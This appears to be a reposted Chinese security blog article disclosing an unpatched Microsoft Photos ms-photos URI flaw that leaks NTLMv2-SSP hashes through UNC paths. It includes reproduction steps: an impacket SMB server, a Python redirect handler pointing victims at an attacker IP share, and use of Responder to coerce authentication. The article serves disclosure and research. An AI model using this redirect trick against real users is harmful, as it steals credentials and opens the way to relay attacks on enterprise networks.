文章总结: 微软Photos应用存在零日漏洞,攻击者可通过ms-photosURI方案结合UNC路径泄露用户NTLMv2-SSP哈希值。该漏洞允许攻击者构造特殊链接诱使受害者从浏览器启动Photos应用,导致凭据泄露,可能引发企业环境中的中继攻击和供应链攻击。微软尚未意识到此漏洞,文章提供了详细的重现步骤和防护建议。
综合评分: 87
文章分类: 漏洞分析,网络安全,WEB安全,应用安全,漏洞预警
新的零日漏洞允许一键泄露浏览器中的 NTLM 哈希值
Ots安全
2025年11月19日 15:29
广东
威胁简报
恶意软件
漏洞攻击
描述
微软的 ms-photos URI 方案将 fileName 作为参数,该参数可以与 UNC 路径一起提交,从而在打开文件时泄露 NTLMv2-SSP 哈希值。攻击者通过构造特殊格式的链接,可以诱使受害者直接从浏览器启动 Microsoft Photos 应用。一旦触发,受害者的 NTLMv2-SSP 哈希值就会泄露到攻击者控制的服务器。此问题会导致凭据泄露,并可能引发企业环境中的中继攻击,而用户只需进行极少的操作(打开应用)。微软并未意识到此漏洞,也没有发布 CVE 编号。此外,我的灵感来源于Syss 2022 年的一篇博客文章。
由于 NTLMv2-SSP 挑战可能会泄露到面向公众的 UNC 路径(除非设置了出站 SMB/445 防火墙规则),因此该漏洞可以与网站感染结合起来,导致供应链攻击。
从MSDN 文档中关于 URI 方案的内容我们可以找到以下信息:
重现步骤
打开 SMB 服务器
# With a picture: Opens the photo on the target with photos.exe
# Without a picture: Nothing, no photos.exe process window
impacket-smbserver share . -smb2support
启动恶意 Python 服务器
# Edit first the information about the IP, share, and filename for UNC coercing.
python3 ms-photos-server.py
浏览至该位置
打开 Chrome 浏览器并访问 /test 页面
此外,也可以使用响应器来实现。任何发出 LLMNR 请求的未解析域都将被重定向到该脚本,从而强制任何用户进行身份验证,而无需弹出 NTLM 用户名/密码验证窗口。要使其正常工作,请先运行该脚本,然后再运行响应器。
之所以有效,是因为我们的应用程序直接重定向到 ms-photos URI 方案,其中包含我们服务器的 UNC 路径:
class RedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
if self.path == "/":
self.send_response(302) # HTTP 302 Found (temporary redirect)
self.send_header('Location', 'ms-photos:viewer?fileName=\\\\192.168.159.129\\share\\Capture.png')
self.end_headers()
else:
self.send_response(404)
self.end_headers()
self.wfile.write(b"Not Found")
客户端重定向:
END
公众号内容都来自国外平台-所有文章可通过点击阅读原文到达原文地址或参考地址
排版 编辑 | Ots 小安
采集 翻译 | Ots Ai牛马
公众号 | AnQuan7 (Ots安全)
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:Ots安全 《新的零日漏洞允许一键泄露浏览器中的 NTLM 哈希值》